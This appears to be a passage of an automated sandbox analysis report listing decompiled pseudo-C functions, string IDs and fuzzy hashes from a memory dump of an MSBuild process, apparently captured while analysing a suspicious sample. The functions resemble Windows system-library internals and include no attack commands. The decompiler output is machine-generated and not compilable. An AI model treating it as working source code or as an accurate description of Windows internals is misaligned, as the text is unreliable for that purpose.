





                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryName
                                            • API String ID: 0-215506332
                                            • Opcode ID: 393b34b1848fc93b60088e8d90602fa57b78c31a1c2ec12c27021bb10ba6a850
                                            • Instruction ID: 11de0175e092ce637f16ec6fb5b7d40a4435575e67b1496d971e7b6ad8045380
                                            • Opcode Fuzzy Hash: 393b34b1848fc93b60088e8d90602fa57b78c31a1c2ec12c27021bb10ba6a850
                                            • Instruction Fuzzy Hash: 8F31057290461AFFDB16EA58C945DAFBBB4FB94F20F014169E9D5AB240D731DE00C7A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 33%
                                            			E0103D294(void* __ecx, char __edx, void* __eflags) {
                                            				signed int _v8;
                                            				char _v52;
                                            				signed int _v56;
                                            				signed int _v60;
                                            				intOrPtr _v64;
                                            				char* _v68;
                                            				intOrPtr _v72;
                                            				char _v76;
                                            				signed int _v84;
                                            				intOrPtr _v88;
                                            				char _v92;
                                            				intOrPtr _v96;
                                            				intOrPtr _v100;
                                            				char _v104;
                                            				char _v105;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t35;
                                            				char _t38;
                                            				signed int _t40;
                                            				signed int _t44;
                                            				signed int _t52;
                                            				void* _t53;
                                            				void* _t55;
                                            				void* _t61;
                                            				intOrPtr _t62;
                                            				void* _t64;
                                            				signed int _t65;
                                            				signed int _t66;
                                            
                                            				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                            				_v8 =  *0x10fd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                            				_v105 = __edx;
                                            				_push( &_v92);
                                            				_t52 = 0;
                                            				_push(0);
                                            				_push(0);
                                            				_push( &_v104);
                                            				_push(0);
                                            				_t59 = __ecx;
                                            				_t55 = 2;
                                            				if(E01024120(_t55, __ecx) < 0) {
                                            					_t35 = 0;
                                            					L8:
                                            					_pop(_t61);
                                            					_pop(_t64);
                                            					_pop(_t53);
                                            					return E0104B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                            				}
                                            				_v96 = _v100;
                                            				_t38 = _v92;
                                            				if(_t38 != 0) {
                                            					_v104 = _t38;
                                            					_v100 = _v88;
                                            					_t40 = _v84;
                                            				} else {
                                            					_t40 = 0;
                                            				}
                                            				_v72 = _t40;
                                            				_v68 =  &_v104;
                                            				_push( &_v52);
                                            				_v76 = 0x18;
                                            				_push( &_v76);
                                            				_v64 = 0x40;
                                            				_v60 = _t52;
                                            				_v56 = _t52;
                                            				_t44 = E010498D0();
                                            				_t62 = _v88;
                                            				_t65 = _t44;
                                            				if(_t62 != 0) {
                                            					asm("lock xadd [edi], eax");
                                            					if((_t44 | 0xffffffff) != 0) {
                                            						goto L4;
                                            					}
                                            					_push( *((intOrPtr*)(_t62 + 4)));
                                            					E010495D0();
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                            					goto L4;
                                            				} else {
                                            					L4:
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                            					if(_t65 >= 0) {
                                            						_t52 = 1;
                                            					} else {
                                            						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                            							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                            						}
                                            					}
                                            					_t35 = _t52;
                                            					goto L8;
                                            				}
                                            			}


































                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: c780d085c60363481220c0048651271f3338e39e725c85a14ec347fb86dba450
                                            • Instruction ID: b758b149ba95889a0e71a2d5a51142f784cc2d581ffe22ee53801173bd1a2509
                                            • Opcode Fuzzy Hash: c780d085c60363481220c0048651271f3338e39e725c85a14ec347fb86dba450
                                            • Instruction Fuzzy Hash: 42318DB1508305AFD361DF68C980AAFBBECEBD9654F40492EF9D483250D635DD08CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E01011B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                            				intOrPtr _v8;
                                            				char _v16;
                                            				intOrPtr* _t26;
                                            				intOrPtr _t29;
                                            				void* _t30;
                                            				signed int _t31;
                                            
                                            				_t27 = __ecx;
                                            				_t29 = __edx;
                                            				_t31 = 0;
                                            				_v8 = __edx;
                                            				if(__edx == 0) {
                                            					L18:
                                            					_t30 = 0xc000000d;
                                            					goto L12;
                                            				} else {
                                            					_t26 = _a4;
                                            					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                            						goto L18;
                                            					} else {
                                            						E0104BB40(__ecx,  &_v16, __ecx);
                                            						_push(_t26);
                                            						_push(0);
                                            						_push(0);
                                            						_push(_t29);
                                            						_push( &_v16);
                                            						_t30 = E0104A9B0();
                                            						if(_t30 >= 0) {
                                            							_t19 =  *_t26;
                                            							if( *_t26 != 0) {
                                            								goto L7;
                                            							} else {
                                            								 *_a8 =  *_a8 & 0;
                                            							}
                                            						} else {
                                            							if(_t30 != 0xc0000023) {
                                            								L9:
                                            								_push(_t26);
                                            								_push( *_t26);
                                            								_push(_t31);
                                            								_push(_v8);
                                            								_push( &_v16);
                                            								_t30 = E0104A9B0();
                                            								if(_t30 < 0) {
                                            									L12:
                                            									if(_t31 != 0) {
                                            										L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                            									}
                                            								} else {
                                            									 *_a8 = _t31;
                                            								}
                                            							} else {
                                            								_t19 =  *_t26;
                                            								if( *_t26 == 0) {
                                            									_t31 = 0;
                                            								} else {
                                            									L7:
                                            									_t31 = L01024620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                            								}
                                            								if(_t31 == 0) {
                                            									_t30 = 0xc0000017;
                                            								} else {
                                            									goto L9;
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _t30;
                                            			}










                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: WindowsExcludedProcs
                                            • API String ID: 0-3583428290
                                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                            • Instruction ID: e0548e87590ad8fad4cf8e354e42f4708b9b8ec966536465c993339cfee2e720
                                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                            • Instruction Fuzzy Hash: B521F87A50012DEBEB269AA9C880F9F7BADAF44650F054465FF848B204D638DC0087B0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0102F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                            				intOrPtr _t13;
                                            				intOrPtr _t14;
                                            				signed int _t16;
                                            				signed char _t17;
                                            				intOrPtr _t19;
                                            				intOrPtr _t21;
                                            				intOrPtr _t23;
                                            				intOrPtr* _t25;
                                            
                                            				_t25 = _a8;
                                            				_t17 = __ecx;
                                            				if(_t25 == 0) {
                                            					_t19 = 0xc00000f2;
                                            					L8:
                                            					return _t19;
                                            				}
                                            				if((__ecx & 0xfffffffe) != 0) {
                                            					_t19 = 0xc00000ef;
                                            					goto L8;
                                            				}
                                            				_t19 = 0;
                                            				 *_t25 = 0;
                                            				_t21 = 0;
                                            				_t23 = "Actx ";
                                            				if(__edx != 0) {
                                            					if(__edx == 0xfffffffc) {
                                            						L21:
                                            						_t21 = 0x200;
                                            						L5:
                                            						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                            						 *_t25 = _t13;
                                            						L6:
                                            						if(_t13 == 0) {
                                            							if((_t17 & 0x00000001) != 0) {
                                            								 *_t25 = _t23;
                                            							}
                                            						}
                                            						L7:
                                            						goto L8;
                                            					}
                                            					if(__edx == 0xfffffffd) {
                                            						 *_t25 = _t23;
                                            						_t13 = _t23;
                                            						goto L6;
                                            					}
                                            					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                            					 *_t25 = _t13;
                                            					L14:
                                            					if(_t21 == 0) {
                                            						goto L6;
                                            					}
                                            					goto L5;
                                            				}
                                            				_t14 = _a4;
                                            				if(_t14 != 0) {
                                            					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                            					if(_t16 <= 1) {
                                            						_t21 = 0x1f8;
                                            						_t13 = 0;
                                            						goto L14;
                                            					}
                                            					if(_t16 == 2) {
                                            						goto L21;
                                            					}
                                            					if(_t16 != 4) {
                                            						_t19 = 0xc00000f0;
                                            						goto L7;
                                            					}
                                            					_t13 = 0;
                                            					goto L6;
                                            				} else {
                                            					_t21 = 0x1f8;
                                            					goto L5;
                                            				}
                                            			}












                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx
                                            • API String ID: 0-89312691
                                            • Opcode ID: 78c7f1d77b1aab18b0013a36957cae8e5fb2e57e1ef2f3e7ac69aa9eee538f9d
                                            • Instruction ID: feb54a1ff32667ae08d53582f2fe8b9eca7a7951a49aa6bab3bde48d8835f98a
                                            • Opcode Fuzzy Hash: 78c7f1d77b1aab18b0013a36957cae8e5fb2e57e1ef2f3e7ac69aa9eee538f9d
                                            • Instruction Fuzzy Hash: DC11B235704A238BEBA54E1DC99073A76F9FB857E4F24457AE9E1CB391DB70C8408340
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 71%
                                            			E010B8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                            				intOrPtr _t35;
                                            				void* _t41;
                                            
                                            				_t40 = __esi;
                                            				_t39 = __edi;
                                            				_t38 = __edx;
                                            				_t35 = __ecx;
                                            				_t34 = __ebx;
                                            				_push(0x74);
                                            				_push(0x10e0d50);
                                            				E0105D0E8(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                            				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                            				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                            					E01095720(0x65, 0, "Critical error detected %lx\n", _t35);
                                            					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                            						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                            						asm("int3");
                                            						 *(_t41 - 4) = 0xfffffffe;
                                            					}
                                            				}
                                            				 *(_t41 - 4) = 1;
                                            				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                            				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                            				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                            				 *((intOrPtr*)(_t41 - 0x64)) = L0105DEF0;
                                            				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                            				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                            				_push(_t41 - 0x70);
                                            				L0105DEF0(1, _t38);
                                            				 *(_t41 - 4) = 0xfffffffe;
                                            				return E0105D130(_t34, _t39, _t40);
                                            			}






                                            Strings
                                            • Critical error detected %lx, xrefs: 010B8E21
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Critical error detected %lx
                                            • API String ID: 0-802127002
                                            • Opcode ID: 5b6dbf9d3eee40ce2c311cc0dde8d90da779b259493b3ae2b2571f43c701f725
                                            • Instruction ID: 083b35553337196aa23cd100920c12757403315953e783f8e0df2289d1658d3f
                                            • Opcode Fuzzy Hash: 5b6dbf9d3eee40ce2c311cc0dde8d90da779b259493b3ae2b2571f43c701f725
                                            • Instruction Fuzzy Hash: 05118771D04348EAEF25DFA8C9457DDBBB4BB04310F24825EE5A8AB3A2C3344602CF14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0109FF60
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                            • API String ID: 0-1911121157
                                            • Opcode ID: 3432f7d8ee0176855556a7ca651ee545a2328f5ffc3d1b02c886eaade9f72785
                                            • Instruction ID: 3759ffda64c387b30fb83136d586a296b30316b910ac77e596832fc2a98f86bb
                                            • Opcode Fuzzy Hash: 3432f7d8ee0176855556a7ca651ee545a2328f5ffc3d1b02c886eaade9f72785
                                            • Instruction Fuzzy Hash: 2611E171510145EFDF62DB54C859FD8BBF1FF04704F148488E688AB5A1C7399940EB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 88%
                                            			E010D5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                            				signed int _t296;
                                            				signed char _t298;
                                            				signed int _t301;
                                            				signed int _t306;
                                            				signed int _t310;
                                            				signed char _t311;
                                            				intOrPtr _t312;
                                            				signed int _t313;
                                            				void* _t327;
                                            				signed int _t328;
                                            				intOrPtr _t329;
                                            				intOrPtr _t333;
                                            				signed char _t334;
                                            				signed int _t336;
                                            				void* _t339;
                                            				signed int _t340;
                                            				signed int _t356;
                                            				signed int _t362;
                                            				short _t367;
                                            				short _t368;
                                            				short _t373;
                                            				signed int _t380;
                                            				void* _t382;
                                            				short _t385;
                                            				signed short _t392;
                                            				signed char _t393;
                                            				signed int _t395;
                                            				signed char _t397;
                                            				signed int _t398;
                                            				signed short _t402;
                                            				void* _t406;
                                            				signed int _t412;
                                            				signed char _t414;
                                            				signed short _t416;
                                            				signed int _t421;
                                            				signed char _t427;
                                            				intOrPtr _t434;
                                            				signed char _t435;
                                            				signed int _t436;
                                            				signed int _t442;
                                            				signed int _t446;
                                            				signed int _t447;
                                            				signed int _t451;
                                            				signed int _t453;
                                            				signed int _t454;
                                            				signed int _t455;
                                            				intOrPtr _t456;
                                            				intOrPtr* _t457;
                                            				short _t458;
                                            				signed short _t462;
                                            				signed int _t469;
                                            				intOrPtr* _t474;
                                            				signed int _t475;
                                            				signed int _t479;
                                            				signed int _t480;
                                            				signed int _t481;
                                            				short _t485;
                                            				signed int _t491;
                                            				signed int* _t494;
                                            				signed int _t498;
                                            				signed int _t505;
                                            				intOrPtr _t506;
                                            				signed short _t508;
                                            				signed int _t511;
                                            				void* _t517;
                                            				signed int _t519;
                                            				signed int _t522;
                                            				void* _t523;
                                            				signed int _t524;
                                            				void* _t528;
                                            				signed int _t529;
                                            
                                            				_push(0xd4);
                                            				_push(0x10e1178);
                                            				E0105D0E8(__ebx, __edi, __esi);
                                            				_t494 = __edx;
                                            				 *(_t528 - 0xcc) = __edx;
                                            				_t511 = __ecx;
                                            				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                            				 *(_t528 - 0xbc) = __ecx;
                                            				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                            				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                            				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                            				_t427 = 0;
                                            				 *(_t528 - 0x74) = 0;
                                            				 *(_t528 - 0x9c) = 0;
                                            				 *(_t528 - 0x84) = 0;
                                            				 *(_t528 - 0xac) = 0;
                                            				 *(_t528 - 0x88) = 0;
                                            				 *(_t528 - 0xa8) = 0;
                                            				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                            				if( *(_t528 + 0x1c) <= 0x80) {
                                            					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                            					if(__eflags != 0) {
                                            						_t421 = E010D4C56(0, __edx, __ecx, __eflags);
                                            						__eflags = _t421;
                                            						if(_t421 != 0) {
                                            							 *((intOrPtr*)(_t528 - 4)) = 0;
                                            							E0104D000(0x410);
                                            							 *(_t528 - 0x18) = _t529;
                                            							 *(_t528 - 0x9c) = _t529;
                                            							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                            							E010D5542(_t528 - 0x9c, _t528 - 0x84);
                                            						}
                                            					}
                                            					_t435 = _t427;
                                            					 *(_t528 - 0xd0) = _t435;
                                            					_t474 = _t511 + 0x65;
                                            					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                            					_t511 = 0x18;
                                            					while(1) {
                                            						 *(_t528 - 0xa0) = _t427;
                                            						 *(_t528 - 0xbc) = _t427;
                                            						 *(_t528 - 0x80) = _t427;
                                            						 *(_t528 - 0x78) = 0x50;
                                            						 *(_t528 - 0x79) = _t427;
                                            						 *(_t528 - 0x7a) = _t427;
                                            						 *(_t528 - 0x8c) = _t427;
                                            						 *(_t528 - 0x98) = _t427;
                                            						 *(_t528 - 0x90) = _t427;
                                            						 *(_t528 - 0xb0) = _t427;
                                            						 *(_t528 - 0xb8) = _t427;
                                            						_t296 = 1 << _t435;
                                            						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                            						__eflags = _t436 & _t296;
                                            						if((_t436 & _t296) != 0) {
                                            							goto L92;
                                            						}
                                            						__eflags =  *((char*)(_t474 - 1));
                                            						if( *((char*)(_t474 - 1)) == 0) {
                                            							goto L92;
                                            						}
                                            						_t301 =  *_t474;
                                            						__eflags = _t494[1] - _t301;
                                            						if(_t494[1] <= _t301) {
                                            							L10:
                                            							__eflags =  *(_t474 - 5) & 0x00000040;
                                            							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                            								L12:
                                            								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                            								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                            									goto L92;
                                            								}
                                            								_t442 =  *(_t474 - 0x11) & _t494[3];
                                            								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                            								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                            									goto L92;
                                            								}
                                            								__eflags = _t442 -  *(_t474 - 0x11);
                                            								if(_t442 !=  *(_t474 - 0x11)) {
                                            									goto L92;
                                            								}
                                            								L15:
                                            								_t306 =  *(_t474 + 1) & 0x000000ff;
                                            								 *(_t528 - 0xc0) = _t306;
                                            								 *(_t528 - 0xa4) = _t306;
                                            								__eflags =  *0x10f60e8;
                                            								if( *0x10f60e8 != 0) {
                                            									__eflags = _t306 - 0x40;
                                            									if(_t306 < 0x40) {
                                            										L20:
                                            										asm("lock inc dword [eax]");
                                            										_t310 =  *0x10f60e8; // 0x0
                                            										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                            										__eflags = _t311 & 0x00000001;
                                            										if((_t311 & 0x00000001) == 0) {
                                            											 *(_t528 - 0xa0) = _t311;
                                            											_t475 = _t427;
                                            											 *(_t528 - 0x74) = _t427;
                                            											__eflags = _t475;
                                            											if(_t475 != 0) {
                                            												L91:
                                            												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                            												goto L92;
                                            											}
                                            											asm("sbb edi, edi");
                                            											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                            											_t511 = _t498;
                                            											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                            											__eflags =  *(_t312 - 5) & 1;
                                            											if(( *(_t312 - 5) & 1) != 0) {
                                            												_push(_t528 - 0x98);
                                            												_push(0x4c);
                                            												_push(_t528 - 0x70);
                                            												_push(1);
                                            												_push(0xfffffffa);
                                            												_t412 = E01049710();
                                            												_t475 = _t427;
                                            												__eflags = _t412;
                                            												if(_t412 >= 0) {
                                            													_t414 =  *(_t528 - 0x98) - 8;
                                            													 *(_t528 - 0x98) = _t414;
                                            													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                            													 *(_t528 - 0x8c) = _t416;
                                            													 *(_t528 - 0x79) = 1;
                                            													_t511 = (_t416 & 0x0000ffff) + _t498;
                                            													__eflags = _t511;
                                            												}
                                            											}
                                            											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                            											__eflags = _t446 & 0x00000004;
                                            											if((_t446 & 0x00000004) != 0) {
                                            												__eflags =  *(_t528 - 0x9c);
                                            												if( *(_t528 - 0x9c) != 0) {
                                            													 *(_t528 - 0x7a) = 1;
                                            													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                            													__eflags = _t511;
                                            												}
                                            											}
                                            											_t313 = 2;
                                            											_t447 = _t446 & _t313;
                                            											__eflags = _t447;
                                            											 *(_t528 - 0xd4) = _t447;
                                            											if(_t447 != 0) {
                                            												_t406 = 0x10;
                                            												_t511 = _t511 + _t406;
                                            												__eflags = _t511;
                                            											}
                                            											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                            											 *(_t528 - 0x88) = _t427;
                                            											__eflags =  *(_t528 + 0x1c);
                                            											if( *(_t528 + 0x1c) <= 0) {
                                            												L45:
                                            												__eflags =  *(_t528 - 0xb0);
                                            												if( *(_t528 - 0xb0) != 0) {
                                            													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                            													__eflags = _t511;
                                            												}
                                            												__eflags = _t475;
                                            												if(_t475 != 0) {
                                            													asm("lock dec dword [ecx+edx*8+0x4]");
                                            													goto L100;
                                            												} else {
                                            													_t494[3] = _t511;
                                            													_t451 =  *(_t528 - 0xa0);
                                            													_t427 = E01046DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                            													 *(_t528 - 0x88) = _t427;
                                            													__eflags = _t427;
                                            													if(_t427 == 0) {
                                            														__eflags = _t511 - 0xfff8;
                                            														if(_t511 <= 0xfff8) {
                                            															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                            															asm("sbb ecx, ecx");
                                            															__eflags = (_t451 & 0x000000e2) + 8;
                                            														}
                                            														asm("lock dec dword [eax+edx*8+0x4]");
                                            														L100:
                                            														goto L101;
                                            													}
                                            													_t453 =  *(_t528 - 0xa0);
                                            													 *_t494 = _t453;
                                            													_t494[1] = _t427;
                                            													_t494[2] =  *(_t528 - 0xbc);
                                            													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                            													 *_t427 =  *(_t453 + 0x24) | _t511;
                                            													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                            													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													__eflags =  *(_t528 + 0x14);
                                            													if( *(_t528 + 0x14) == 0) {
                                            														__eflags =  *[fs:0x18] + 0xf50;
                                            													}
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													__eflags =  *(_t528 + 0x18);
                                            													if( *(_t528 + 0x18) == 0) {
                                            														_t454 =  *(_t528 - 0x80);
                                            														_t479 =  *(_t528 - 0x78);
                                            														_t327 = 1;
                                            														__eflags = 1;
                                            													} else {
                                            														_t146 = _t427 + 0x50; // 0x50
                                            														_t454 = _t146;
                                            														 *(_t528 - 0x80) = _t454;
                                            														_t382 = 0x18;
                                            														 *_t454 = _t382;
                                            														 *((short*)(_t454 + 2)) = 1;
                                            														_t385 = 0x10;
                                            														 *((short*)(_t454 + 6)) = _t385;
                                            														 *(_t454 + 4) = 0;
                                            														asm("movsd");
                                            														asm("movsd");
                                            														asm("movsd");
                                            														asm("movsd");
                                            														_t327 = 1;
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t479 = 0x68;
                                            														 *(_t528 - 0x78) = _t479;
                                            													}
                                            													__eflags =  *(_t528 - 0x79) - _t327;
                                            													if( *(_t528 - 0x79) == _t327) {
                                            														_t524 = _t479 + _t427;
                                            														_t508 =  *(_t528 - 0x8c);
                                            														 *_t524 = _t508;
                                            														_t373 = 2;
                                            														 *((short*)(_t524 + 2)) = _t373;
                                            														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                            														 *((short*)(_t524 + 4)) = 0;
                                            														_t167 = _t524 + 8; // 0x8
                                            														E0104F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                            														_t529 = _t529 + 0xc;
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                            														 *(_t528 - 0x78) = _t479;
                                            														_t380 =  *(_t528 - 0x80);
                                            														__eflags = _t380;
                                            														if(_t380 != 0) {
                                            															_t173 = _t380 + 4;
                                            															 *_t173 =  *(_t380 + 4) | 1;
                                            															__eflags =  *_t173;
                                            														}
                                            														_t454 = _t524;
                                            														 *(_t528 - 0x80) = _t454;
                                            														_t327 = 1;
                                            														__eflags = 1;
                                            													}
                                            													__eflags =  *(_t528 - 0xd4);
                                            													if( *(_t528 - 0xd4) == 0) {
                                            														_t505 =  *(_t528 - 0x80);
                                            													} else {
                                            														_t505 = _t479 + _t427;
                                            														_t523 = 0x10;
                                            														 *_t505 = _t523;
                                            														_t367 = 3;
                                            														 *((short*)(_t505 + 2)) = _t367;
                                            														_t368 = 4;
                                            														 *((short*)(_t505 + 6)) = _t368;
                                            														 *(_t505 + 4) = 0;
                                            														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                            														_t327 = 1;
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t479 = _t479 + _t523;
                                            														 *(_t528 - 0x78) = _t479;
                                            														__eflags = _t454;
                                            														if(_t454 != 0) {
                                            															_t186 = _t454 + 4;
                                            															 *_t186 =  *(_t454 + 4) | 1;
                                            															__eflags =  *_t186;
                                            														}
                                            														 *(_t528 - 0x80) = _t505;
                                            													}
                                            													__eflags =  *(_t528 - 0x7a) - _t327;
                                            													if( *(_t528 - 0x7a) == _t327) {
                                            														 *(_t528 - 0xd4) = _t479 + _t427;
                                            														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                            														E0104F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                            														_t529 = _t529 + 0xc;
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t479 =  *(_t528 - 0x78) + _t522;
                                            														 *(_t528 - 0x78) = _t479;
                                            														__eflags = _t505;
                                            														if(_t505 != 0) {
                                            															_t199 = _t505 + 4;
                                            															 *_t199 =  *(_t505 + 4) | 1;
                                            															__eflags =  *_t199;
                                            														}
                                            														_t505 =  *(_t528 - 0xd4);
                                            														 *(_t528 - 0x80) = _t505;
                                            													}
                                            													__eflags =  *(_t528 - 0xa8);
                                            													if( *(_t528 - 0xa8) != 0) {
                                            														_t356 = _t479 + _t427;
                                            														 *(_t528 - 0xd4) = _t356;
                                            														_t462 =  *(_t528 - 0xac);
                                            														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                            														_t485 = 0xc;
                                            														 *((short*)(_t356 + 2)) = _t485;
                                            														 *(_t356 + 6) = _t462;
                                            														 *((short*)(_t356 + 4)) = 0;
                                            														_t211 = _t356 + 8; // 0x9
                                            														E0104F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                            														E0104FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                            														_t529 = _t529 + 0x18;
                                            														_t427 =  *(_t528 - 0x88);
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t505 =  *(_t528 - 0xd4);
                                            														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                            														 *(_t528 - 0x78) = _t479;
                                            														_t362 =  *(_t528 - 0x80);
                                            														__eflags = _t362;
                                            														if(_t362 != 0) {
                                            															_t222 = _t362 + 4;
                                            															 *_t222 =  *(_t362 + 4) | 1;
                                            															__eflags =  *_t222;
